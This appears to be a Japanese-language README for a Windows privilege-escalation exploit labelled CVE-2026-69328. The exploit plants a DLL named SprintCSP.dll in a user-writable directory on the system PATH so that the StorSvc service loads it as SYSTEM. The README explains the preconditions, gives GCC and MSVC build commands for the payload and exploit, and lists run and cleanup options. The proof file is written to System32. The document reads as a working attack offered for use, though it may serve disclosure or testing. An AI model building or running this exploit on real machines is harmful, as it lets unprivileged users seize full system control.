
Windows 権限昇格エクスプロイト。ユーザー書き込み可能な HKLM PATH ディレクトリに SprintCSP.dll を設置し、StorSvc をハイジャックして SYSTEM として実行する。
StorSvc は SprintCSP.dll を相対名で SYSTEM として読み込む。ユーザー書き込み可能な HKLM PATH ディレクトリに配置すれば SYSTEM を取得できる。
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path にユーザー書き込み可能なディレクトリが必要。
クリーンなイメージには存在しない。ツールのインストーラーが追加する(%USERPROFILE%\.cargo\bin、.local\bin、Python Scripts)。存在しない場合、CVE-2026-69328.exe --setup が作成するが、これには一度だけ管理者プロンプトが必要。エクスプロイト自体は管理者権限を必要としない。
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
証明ファイルは C:\Windows\System32\CVE-2026-69328.txt に出力される。
StorSvc は読み込み後にクラッシュし、SCM が約120秒後に再起動する。